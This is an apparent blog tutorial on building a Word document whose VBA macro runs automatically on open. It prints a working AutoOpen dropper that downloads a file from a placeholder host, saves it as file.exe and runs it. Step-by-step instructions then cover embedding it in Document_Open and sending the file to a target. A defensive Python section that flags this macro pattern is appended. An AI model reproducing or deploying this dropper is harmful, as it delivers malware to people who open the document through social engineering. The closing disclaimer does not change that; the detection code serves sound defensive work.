Creating Malicious Word Macros Tutorial: AutoRun Stub via Word Document


Penetration testers often need to use social engineering attacks. What could be better than a Microsoft Office Word document that carries the payload and exploit in the form of a macro? That is easy, and might be common by now.

What if the Word macro would auto-start and execute the payload instantly? This tutorial explains exactly how to do that.

We will start by creating a Word macro.

Step 1: Create a payload. Word macros are written in VBA, so it's not hard to make them, but many are already made. Here is an example download-and-execute payload:

Sub AutoOpen()

Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "http://<IP>/<FILE>", False
xHttp.Send

With bStrm
 .Type = 1 '//binary
 .Open
 .write xHttp.responseBody
 .savetofile "file.exe", 2 '//overwrite
End With

Shell ("file.exe")

End Sub

The code above is a short VBA macro that downloads a file and executes it.

Step 2: Now that you have a payload, you need to enable the developer option.

To do that, simply go to

File -> Options -> Customize Ribbon -> Click on the box for “Developer”

Step 3: Go to the Developer tab and click on “Visual Basic”

Step 4: Double click on ThisDocument

Step 5: Paste this code into the field that appears

Code:
Private Sub Document_Open()
[payload]
End Sub

Replace [payload] with the VBA payload you're using in your macro.

Here is a screenshot for better understanding:

[Screenshot: payload-word-doc]

In this example, the payload will automatically open a command prompt when the Word file is opened.

Step 6: Now just save the file as filename.docm, send it to the target, and watch as it auto runs your stub. They may get a security warning about the macro, but if they’re running an older version of Microsoft Office, they won’t.
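From the defender's side, the pattern this tutorial builds (an auto-run entry point chained to a download and a process launch) can be triaged statically. The following is an added example, not code from the original post; it assumes the VBA source has already been extracted from the document by a separate tool, and the function names and both sample macros are constructed for illustration.

```python
import io
import re
import zipfile

# Auto-run entry points used in the tutorial: AutoOpen and Document_Open.
AUTOEXEC = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?Sub\s+(AutoOpen|Document_Open)\s*\(", re.I | re.M)
# Behaviours the sample macro chains: HTTP fetch, binary write to disk, process launch.
INDICATORS = {
    "http_download": re.compile(r'CreateObject\(\s*"(?:Microsoft|MSXML2)\.(?:Server)?XMLHTTP', re.I),
    "file_write": re.compile(r"Adodb\.Stream|\.SaveToFile", re.I),
    "process_exec": re.compile(r"\bShell\b", re.I),
}

def has_vba_project(doc_bytes):
    """True if an OOXML file (.docm is a ZIP container) carries a vbaProject.bin part."""
    try:
        with zipfile.ZipFile(io.BytesIO(doc_bytes)) as z:
            return any(n.lower().endswith("vbaproject.bin") for n in z.namelist())
    except zipfile.BadZipFile:
        return False  # legacy OLE .doc or not a document: needs a different parser

def triage_macro(source):
    """Classify extracted VBA source text (extraction is assumed done upstream)."""
    entry = sorted({m.group(1).lower() for m in AUTOEXEC.finditer(source)})
    tags = sorted(name for name, rx in INDICATORS.items() if rx.search(source))
    if entry and "http_download" in tags and "process_exec" in tags:
        verdict = "block"    # auto-run + download + execute, the pattern on this page
    elif entry or tags:
        verdict = "review"   # only part of the pattern; needs an analyst's look
    else:
        verdict = "allow"
    return {"entry_points": entry, "tags": tags, "verdict": verdict}

# Constructed sample mirroring the page's macro (placeholders kept as on the page).
SAMPLE_DROPPER = '''Sub AutoOpen()
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "http://<IP>/<FILE>", False
bStrm.savetofile "file.exe", 2
Shell ("file.exe")
End Sub'''
# Constructed benign macro: no auto-run entry point, no download or exec calls.
SAMPLE_BENIGN = '''Sub FormatHeadings()
Selection.Font.Bold = True
End Sub'''

if __name__ == "__main__":
    print(triage_macro(SAMPLE_DROPPER))
    print(triage_macro(SAMPLE_BENIGN))
```

The patterns match plain source text only, so obfuscated or string-built calls will fall through to "review" or "allow"; treat the verdict as a first-pass filter alongside a policy that blocks macros in documents from the internet.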

Please feel free to post in the comments in case you are stuck anywhere. This technique is for penetration testing and is to be used only in authorized penetration tests by penetration testers.

Purely for educational purposes!
